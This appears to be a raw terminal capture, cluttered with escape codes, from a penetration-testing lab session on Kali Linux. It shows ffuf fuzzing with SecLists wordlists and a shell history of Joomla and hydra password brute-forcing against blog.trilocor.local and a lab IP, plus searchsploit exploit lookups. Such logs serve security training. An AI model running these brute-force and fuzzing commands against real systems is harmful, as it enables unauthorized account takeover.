proto http -w #[33m<#[39m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[67C[8:59:19]#[0m#[96D##[39m -fr
#[33m<#[39m#[39merror_message#[33m>#[39m#[39m #[21D
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[Jrequest.txt
#[JUninstaller.lnk #[Juser_list.txt #[JZoneTransfer.txt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w -fr #[33m<#[39merror_message#[33m>#[39m#[K#[68C[8:59:19]#[0m#[97D/ -
fr#[39m #[33m<#[39merror_messag#[39me#[33m>#[39m#[20D##[4m/#[24m
#[J#[0;1;2mdirectory#[0m
#[01;36mbin#[0m@ #[01;34mboot#[0m/ #[01;34mdev#[0m/
#[01;34metc#[0m/ #[01;34mhome#[0m/ #[01;36mlib#[0m@
#[01;36mlib32#[0m@ #[01;36mlib64#[0m@ #[01;34mlost+found#[0m/
#[01;34mmedia#[0m/ #[01;34mmnt#[0m/
#[01;34mopt#[0m/ #[01;34mproc#[0m/ #[01;34mroot#[0m/
#[01;34mrun#[0m/ #[01;36msbin#[0m@ #[01;34msrv#[0m/
#[01;34msys#[0m/ #[30;42mtmp#[0m/ #[01;34musr#[0m/
#[01;34mvar#[0m/
#[0;1;2mfile#[0m
#[J#[01;36minitrd.img#[0m@ #[J#[01;36minitrd.img.old#[0m@
#[J#[01;36mvmlinuz#[0m@ #[J#[01;36mvmlinuz.old#[0m@
#[J#[5A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[67C[8:59:19]#[0m#[96D##[4m/#[4mu#[24m -
fr#[39m #[33m<#[39merror_messag#[39me#[33m>#[39m#[20D###[24m/#[24mu
#[J#[0;1;2mdirectory#[0m
#[J#[01;34musr#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w /u -fr #[33m<#[39merror_message#[33m>#[39m#[K#[66C[8:59:19]#[0m#[95Ds
-fr#[39m #[33m<#[39merror_messag#[39me#[33m>#[39m#[20D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34musr#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w /us -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[65C[8:59:19]#[0m#[94Dr -fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20D#####[4m/#[4mu#[4ms#[4mr#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34musr#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[64C[8:59:19]#[0m#[93D##[4mr#[4m/#[24m -
fr#[39m #[33m<#[39merror_messag#[39me#[33m>#[39m#[20D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mbin#[0m/ #[J#[01;34mgames#[0m/ #[J#[01;34mi686-w64-mingw32#[0m/
#[J#[01;34minclude#[0m/ #[J#[01;34mlib#[0m/ #[J#[01;34mlib32#[0m/
#[J#[01;34mlib64#[0m/ #[J#[01;34mlibexec#[0m/ #[J#[01;34mlocal#[0m/
#[J#[01;34msbin#[0m/ #[J#[01;34mshare#[0m/ #[J#[01;34msrc#[0m/
#[J#[01;34mx86_64-w64-mingw32#[0m/ #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[63C[8:59:19]#[0m#[92D##[4m/#[4ms#[24m -
fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20D#######[24m/#[24mu#[24ms#[24mr#[24m/
#[24ms
#[J#[0;1;2mdirectory#[0m
#[J#[01;34msbin#[0m/ #[J#[01;34mshare#[0m/ #[J#[01;34msrc#[0m/
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w /usr/s -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[62C[8:59:19]#[0m#[91Dh -fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mshare#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w /usr/sh -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[61C[8:59:19]#[0m#[90Da -fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mshare#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w /usr/sha -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[60C[8:59:19]#[0m#[89Dr -fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20De -fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20D#[10D#[4m/#[4mu#[4ms#[4mr#[4m/
#[4ms#[4mh#[4ma#[4mr#[4me#[24m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mshare#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[58C[8:59:19]#[0m#[87D##[4me#[4m/#[24m -
fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#
[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34maccounts#[0m/ #[01;34maccountsservice#[0m/
#[01;34maclocal#[0m/ #[01;34malsa#[0m/ #[01;34malsa-card-
profile#[0m/ #[01;34mamass#[0m/ #[01;34mant#[0m/
#[01;34mapache2#[0m/
#[01;34mapparmor-features#[0m/ #[01;34mapplication-registry#[0m/
#[01;34mapplications#[0m/ #[01;34mapport#[0m/ #[01;34mapps#[0m/
#[01;34mappstream#[0m/ #[01;34mapt-file#[0m/ #[01;34marp-scan#[0m/
#[01;34maspell#[0m/ #[01;34matril#[0m/
#[01;34mautopsy#[0m/ #[01;34mavahi#[0m/ #[01;34mawk#[0m/
#[01;34mbackgrounds#[0m/ #[01;34mbase-files#[0m/ #[01;34mbase-passwd#[0m/
#[01;34mbash-completion#[0m/ #[01;34mbinfmts#[0m/
#[01;34mbluedevilwizard#[0m/ #[01;34mblueman#[0m/ #[01;34mbug#[0m/
#[01;34mbuild-essential#[0m/ #[01;34mburpsuite#[0m/ #[01;34mca-
certificates#[0m/
#[01;34mca-certificates-java#[0m/ #[01;34mcaja#[0m/
#[01;34mcatdoc#[0m/ #[01;34mcatfish#[0m/ #[01;34mcffi-
wheels#[0m/ #[01;34mcherrytree#[0m/ #[01;34mchromium#[0m/
#[01;34mcmake#[0m/
#[01;34mcolor#[0m/ #[01;34mcolord#[0m/
#[01;34mcolor-schemes#[0m/ #[01;34mcommand-not-found#[0m/ #[01;34mcommix#[0m/
#[01;34mcommon-licenses#[0m/ #[01;34mconfig.kcfg#[0m/ #[01;34mconsolefonts#[0m/
#[01;34mconsole-setup#[0m/ #[01;34mconsoletrans#[0m/
#[01;34mcontractor#[0m/ #[01;34mcreddump7#[0m/ #[01;34mcrunch#[0m/
#[01;34mcryptsetup#[0m/ #[01;34mcups#[0m/ #[01;34mdavtest#[0m/
#[J#[30m#[104m(MORE)#[39m#[49m#[9A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[57C[8:59:19]#[0m#[86D##[4m/#[4ms#[24m -
fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20D#[12D#[24m/#[24mu#[24ms#[24mr#[24m/
#[24ms#[24mh#[24ma#[24mr#[24me#[24m/#[24ms
#[J#[0;1;2mdirectory#[0m
#[01;34msakis3g#[0m/ #[01;34msamba#[0m/ #[01;34msass#[0m/
#[01;34mscreen#[0m/ #[01;34msddm#[0m/ #[01;34mseclists#[0m/
#[01;34msensible-utils#[0m/ #[01;34mset#[0m/ #[01;34msgml#[0m/
#[01;34msgml-base#[0m/ #[01;34msgml-data#[0m/ #[01;34mskipfish#[0m/
#[01;34mslapd#[0m/ #[01;34msmartmontools#[0m/ #[01;34msnmp#[0m/
#[01;34msoftware-properties#[0m/ #[01;34msolid#[0m/ #[01;34msounds#[0m/
#[01;34mspa-0.2#[0m/ #[01;34mspeech-dispatcher#[0m/
#[01;34msphinx_rtd_theme#[0m/ #[01;34mspiderfoot#[0m/ #[01;34mspike#[0m/
#[01;34msqlmap#[0m/ #[01;34mssl-cert#[0m/ #[01;34mstrongswan#[0m/
#[01;34msystemd#[0m/
#[J#[01;34msystemsettings#[0m/ #[J#[01;34msystemtap#[0m/
#[J#[01;34msystem-tools-backends-2.0#[0m/ #[J
#[5A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w /usr/share/s -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[56C[8:59:19]#[0m#[85De -fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mseclists#[0m/ #[J#[01;34msensible-utils#[0m/ #[J#[01;34mset#[0m/
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w /usr/share/se -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[55C[8:59:19]#[0m#[84Dc -fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mseclists#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w /usr/share/sec -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[54C[8:59:19]#[0m#[83D
#[J#[A#[71C#[14D#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/
#[4ms#[4me#[4mc#[4ml#[4mi#[4ms#[4mt#[4ms#[39m#[1m#[4m/#[0m#[24m -fr
#[33m<#[39merror_m#[39message#[33m>#[39m#[20D
#[J#[0;1;2mdirectory#[0m
#[01;34mDiscovery#[0m/ #[01;34mFuzzing#[0m/ #[01;34mIOCs#[0m/
#[01;34mMiscellaneous#[0m/ #[01;34mPasswords#[0m/ #[01;34mPattern-
Matching#[0m/ #[01;34mPayloads#[0m/ #[01;34mUsernames#[0m/ #[01;34mWeb-
Shells#[0m/
#[0;1;2mfile#[0m
#[J#[0mREADME.md#[J#[4A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists#[1m#[4m/#[0m#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[48C[8:59:19]#[0m#[77D##[1m#[4m/
#[1m#[4mF#[0m#[24m -fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20D#[21D#[24m/#[24mu#[24ms#[24mr#[24m/
#[24ms#[24mh#[24ma#[24mr#[24me#[24m/
#[24ms#[24me#[24mc#[24ml#[24mi#[24ms#[24mt#[24ms#[0m#[24m/#[0m#[24mF
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mFuzzing#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w /usr/share/seclists/F -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[47C[8:59:19]#[0m#[76Du -fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mFuzzing#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w /usr/share/seclists/Fu -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[46C[8:59:19]#[0m#[75Dz -fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20Dz -fr#[39m
#[33m<#[39merror_messag#[39me#[33m>#[39m#[20D
#[J#[0;1;2mdirectory#[0m
#[J#[01;34mFuzzing#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w /usr/share/seclists/Fuzz -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[44C[8:59:19]#[0m#[73D
#[J#[A#[81C#[24D#[4m/#[4mu#[4ms#[4mr#[4m/#[4ms#[4mh#[4ma#[4mr#[4me#[4m/
#[4ms#[4me#[4mc#[4ml#[4mi#[4ms#[4mt#[4ms#[4m/
#[4mF#[4mu#[4mz#[4mz#[4mi#[4mn#[4mg#[1m#[4m/#[0m#[24m #[39m-fr
#[33m<#[39merror_mes#[39msage#[33m>#[39m#[20D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#
[49m#[30m#[104m#[39m#[49m
#[J#[0;1;2mdirectory#[0m
#[01;34m403#[0m/ #[01;34mAmounts#[0m/
#[01;34mDatabases#[0m/ #[01;34mLFI#[0m/
#[01;34mPolyglots#[0m/ #[01;34mSQLi#[0m/ #[01;34mUser-
Agents#[0m/ #[01;34mXSS#[0m/
#[0;1;2mfile#[0m
#[0m1-4_all_letters_a-z.txt 3-digits-000-999.txt 4-
digits-0000-9999.txt 5-digits-00000-99999.txt
6-digits-000000-999999.txt alphanum-case-extra.txt
alphanum-case.txt big-list-of-naughty-strings.txt
char.txt command-injection-commix.txt
country-codes.txt doble-uri-hex.txt
email-top-100-domains.txt environment-identifiers.txt
extensions-Bo0oM.txt extensions-compressed.fuzz.txt
extensions-most-common.fuzz.txt extensions-skipfish.fuzz.txt
extension-test.txt file-extensions-all-cases.txt
file-extensions-lower-case.txt file-extensions.txt file-
extensions-upper-case.txt FormatString-Jhaddix.txt
fuzz-Bo0oM-friendly.txt fuzz-Bo0oM.txt
FuzzingStrings-SkullSecurity.org.txt HTML5sec-Injections-Jhaddix.txt
http-request-methods.txt IBMMQSeries-channels.txt
JSON.Fuzzing.txt LDAP-active-directory-attributes.txt
LDAP-active-directory-classes.txt LDAP.Fuzzing.txt LDAP-
openldap-attributes.txt LDAP-openldap-classes.txt
#[J#[30m#[104m(MORE)#[39m#[49m#[13A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists/Fuzzing#[1m#[4m/#[0m#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[40C[8:59:19]#[0m#[69D##[0m#[4m/
#[4m4#[4m0#[4m3#[1m#[4m/#[0m#[24m #[39m-fr
#[33m<#[39merror_mes#[39msage#[33m>#[39m#[20D
#[0;1;2mdirectory#[0m#[K#[K
#[7m403/ #[0m #[01;34mAmounts#[0m/ #[01;34mDatabases#[0m/
#[01;34mLFI#[0m/ #[01;34mPolyglots#[0m/ #[01;34mSQLi#[0m/
#[01;34mUser-Agents#[0m/ #[01;34mXSS#[0m/ #[K
#[0;1;2mfile#[0m#[K#[K
#[0m1-4_all_letters_a-z.txt 3-digits-000-999.txt 4-
digits-0000-9999.txt 5-digits-00000-99999.txt #[K
6-digits-000000-999999.txt alphanum-case-extra.txt
alphanum-case.txt big-list-of-naughty-strings.txt #[K
char.txt command-injection-commix.txt
country-codes.txt doble-uri-hex.txt #[K
email-top-100-domains.txt environment-identifiers.txt
extensions-Bo0oM.txt extensions-compressed.fuzz.txt #[K
extensions-most-common.fuzz.txt extensions-skipfish.fuzz.txt
extension-test.txt file-extensions-all-cases.txt #[K
file-extensions-lower-case.txt file-extensions.txt file-
extensions-upper-case.txt FormatString-Jhaddix.txt #[K
fuzz-Bo0oM-friendly.txt fuzz-Bo0oM.txt
FuzzingStrings-SkullSecurity.org.txt HTML5sec-Injections-Jhaddix.txt #[K
http-request-methods.txt IBMMQSeries-channels.txt
JSON.Fuzzing.txt LDAP-active-directory-attributes.txt#[K
LDAP-active-directory-classes.txt LDAP.Fuzzing.txt LDAP-
openldap-attributes.txt LDAP-openldap-classes.txt #[K
Metacharacters.fuzzdb.txt numeric-fields-only.txt os-
names-mutated.txt os-names.txt #[K
php-magic-methods.txt special-chars.txt SSI-
Injection-Jhaddix.txt template-engines-expression.txt #[K
template-engines-special-vars.txt Unicode.txt
UnixAttacks.fuzzdb.txt URI-hex.txt #[K
URI-XSS.fuzzdb.txt Windows-Attacks.fuzzdb.txt XML-
FUZZ.txt XSS-Fuzzing #[K
#[JXXE-Fuzzing.txt #[J
#[17A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists/Fuzzing/403#[1m#[4m/#[0m#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[36C[8:59:19]#[0m#[65D
#[1B#[7m403/ #[0m
#[7m403/ #[0m
#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists/Fuzzing/403#[1m#[4m/#[0m#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[36C[8:59:19]#[0m#[65D#####[4m1#[4m-
#[4m4#[0m#[4m_#[4ma#[4ml#[4ml#[4m_#[4ml#[39m#[4me#[4mt#[4mt#[4me#[4mr#[4ms#[4m_#[4m
a#[4m-#[4mz#[4m.#[4mt#[4mx#[4mt#[24m#[39m -fr
#[33m<#[39merror_message#[33m>#[39m#[20D
#[1B#[01;34m403#[0m/
#[2B#[7m1-4_all_letters_a-z.txt #[0m
#[4A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists/Fuzzing/1-4_all_letters_a-z.txt#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[17C[8:59:19]#[0m#[46D#[23D#[4m3#[4m-
#[4md#[4mi#[4mg#[4mi#[4mt#[4ms#[4m-#[4m0#[4m0#[4m0#[4m-
#[4m9#[4m9#[4m9#[4m.#[4mt#[4mx#[4mt#[24m#[24m #[24m-#[24mfr
#[33m<#[39mer#[39mror_message#[33m>#[39m #[39m #[23D
#[3B#[38C#[7m3-digits-000-999.txt #[0m
1-4_all_letters_a-z.txt
#[4A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists/Fuzzing/3-digits-000-999.txt#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[20C[8:59:19]#[0m#[49D#[20D#[4m4#[11C#[4m0#[
4m-#[2C#[4m9#[4m9#[4m.#[4mt#[4mx#[4mt#[24m -f#[39mr
#[33m<#[39merror_messa#[39mge#[33m>#[39m#[20D
#[3B#[76C#[7m4-digits-0000-9999.txt #[0m
#[38C3-digits-000-999.txt
#[4A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[18C[8:59:19]#[0m#[47D
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[Jrequest.txt
#[JUninstaller.lnk #[Juser_list.txt #[JZoneTransfer.txt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt#[24m#[1m #[0m
-fr #[33m<#[39merror_message#[33m>#[39m#[K#[17C[8:59:19]#[0m#[46D##[0m -fr
#[33m<#[39m#[39merror_message#[33m>#[39m#[39m #[21D
#[J#[0;1;2mfile#[0m
#[J#[0m4-digits-0000-9999.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[18C[8:59:19]#[0m#[47D#[20C
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[Jrequest.txt
#[JUninstaller.lnk #[Juser_list.txt #[JZoneTransfer.txt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt#[24m -fr
#[33m<#[39merror_message#[33m>#[39m#[K#[18C[8:59:19]#[0m#[27D#[8D #[39m
#[8D###### ######
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[Jrequest.txt
#[JUninstaller.lnk #[Juser_list.txt #[JZoneTransfer.txt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt#[24m -fr
#[33m<#[39m#[K#[32C[8:59:19]#[0m#[41D#### #[39m
#####[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mfile#[0m
#[0mmain_wordlist.txt user_list.txt
#[J#[0;2m#[1mcommon substring:#[0m #[30m#[103m_.txt#[39m#[49m#[3A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt#[24m -
#[K#[36C[8:59:19]#[0m#[45D# #
#[J#[0;1;2mfile#[0m
#[J#[0mhydra.restore #[Jmain_wordlist.txt #[Jrequest.txt
#[JUninstaller.lnk #[Juser_list.txt #[JZoneTransfer.txt
#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists/Fuzzing/4-digits-0000-
9999.txt#[24m#[K#[38C[8:59:19]#[0m#[46D#
#[J#[0;1;2mfile#[0m
#[J#[0m4-digits-0000-9999.txt#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mffuf#[39m -request #[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m -request-
proto http -w #[4m/usr/share/seclists/Fuzzing/4-digits-0000-
9999.txt#[24m#[K#[38C[8:59:19]#[0m#[47D#[?1l#>#[?2004l
#[J#[A#[107C
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/CPTS/NIX01##]1;~/CPTS/NIX01##]7;file:///home/kali/CPTS/NIX01#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m964#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[8:59:57]#[148D#[?1h#=#[?
2004h
Loading...#[K#[A#####[32mffuf#[39m -request
#[33m<#[39m#[4mrequest.txt#[24m#[33m>#[39m #[4m-request-proto#[24m http -w
#[4m/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt#[24m#[1m;#[0m#[1B
#[K#[A#[108C#[1B
#[2m #[0m#[2m925#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m926#[0m#[2m #[0msudo python3 joomla-brute.py -u blog.trilocor.local
-w /usr/share/seclists/Passwords/500-worst-passwords.txt -usr
~/CPTS/NIX01/user_list.txt #[K#[K
#[2m #[0m#[2m927#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr ~/CPTS/NIX01/user_list.txt#[K#[K
#[2m #[0m#[2m928#[0m#[2m #[0msudo python3 joomla-brute.py
#[K#[K
#[2m #[0m#[2m929#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-U ~/CPTS/NIX01/user_list.txt #[K#[K
#[2m #[0m#[2m930#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local/administrator -w /usr/share/seclists/Passwords/500-
worst-passwords.txt -U ~/CPTS/NIX01/u#[K#[K
#[2m #[0m#[2m931#[0m#[2m* #[0mifconfig
#[K#[K
#[2m #[0m#[2m932#[0m#[2m #[0msudo python3 joomla-brute.py -u blog.trilocor.local
-w /usr/share/seclists/Passwords/500-worst-passwords.txt -usr admin
#[K#[K
#[2m #[0m#[2m933#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr admin #[K#[K
#[2m #[0m#[2m934#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr root #[K#[K
#[2m #[0m#[2m935#[0m#[2m #[0msudo python2.7 -m pip install urllib3
#[K#[K
#[2m #[0m#[2m936#[0m#[2m #[0mpip install urllib3
#[K#[K
#[2m #[0m#[2m937#[0m#[2m #[0mpip install certifi
#[K#[K
#[2m #[0m#[2m938#[0m#[2m #[0mpip install bs4
#[K#[K
#[2m #[0m#[2m939#[0m#[2m #[0mcd ../
#[K#[K
#[2m #[0m#[2m940#[0m#[2m #[0mwhatis gh
#[K#[K
#[2m #[0m#[2m941#[0m#[2m #[0mgithub repo clone drego85/JoomlaScan
#[K#[K
#[2m #[0m#[2m942#[0m#[2m #[0mcd ../Downloads
#[K#[K
#[2m #[0m#[2m943#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m944#[0m#[2m #[0munzip JoomlaScan-master.zip
#[K#[K
#[2m #[0m#[2m945#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m946#[0m#[2m #[0mmv JoomlaScan-master ../Tools
#[K#[K
#[2m #[0m#[2m947#[0m#[2m #[0mcd ../Tools/JoomlaScan-master
#[K#[K
#[2m #[0m#[2m948#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m949#[0m#[2m #[0mpython2.7 joomlascan.py -u
http://blog.trilocor.local
#[K#[K
#[2m #[0m#[2m950#[0m#[2m #[0msearchsploit com_contact
#[K#[K
#[2m #[0m#[2m951#[0m#[2m #[0msearchsploit com_content
#[K#[K
#[2m #[0m#[2m952#[0m#[2m #[0mlocate 11236.txt
#[K#[K
#[2m #[0m#[2m953#[0m#[2m #[0mcat
/usr/share/exploitdb/exploits/php/webapps/11236.txt
#[K#[K
#[2m #[0m#[2m954#[0m#[2m #[0msearchsploit cassiopeia
#[K#[K
#[2m #[0m#[2m955#[0m#[2m* #[0mffuf -t 100 -ic -c -u
http://blog.trilocor.local/FUZZ -w
/usr/share/seclists/Discovery/Web-Content/Apache.fuzz.txt
#[K#[K
#[2m #[0m#[2m956#[0m#[2m #[0mftp anonymous@10.129.197.143
#[K#[K
#[2m #[0m#[2m957#[0m#[2m #[0msudo apt-get install --yes filezilla
#[K#[K
#[2m #[0m#[2m958#[0m#[2m #[0mhydra -V -f -l admin@trilocor.local -P
/usr/share/seclists/Passwords/500-worst-passwords.txt pop3://10.129.197.143
#[K#[K
#[2m #[0m#[2m959#[0m#[2m #[0mhydra -V -f -l user@trilocor.local -P
/usr/share/seclists/Passwords/500-worst-passwords.txt pop3://10.129.197.143
#[K#[K
#[2m #[0m#[2m960#[0m#[2m #[0msearchsploit werkzeug
#[K#[K
#[2m #[0m#[2m961#[0m#[2m #[0mcd ~/CPTS/NIX01
#[K#[K
#[2m #[0m#[2m962#[0m#[2m #[0mgedit request.txt
#[K#[K
#[J#[7m 963 ffuf -request <request.txt> -request-proto http -w
/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt
#[0m#[K#[J#[39A#[0m#[27m#[24m#[0m
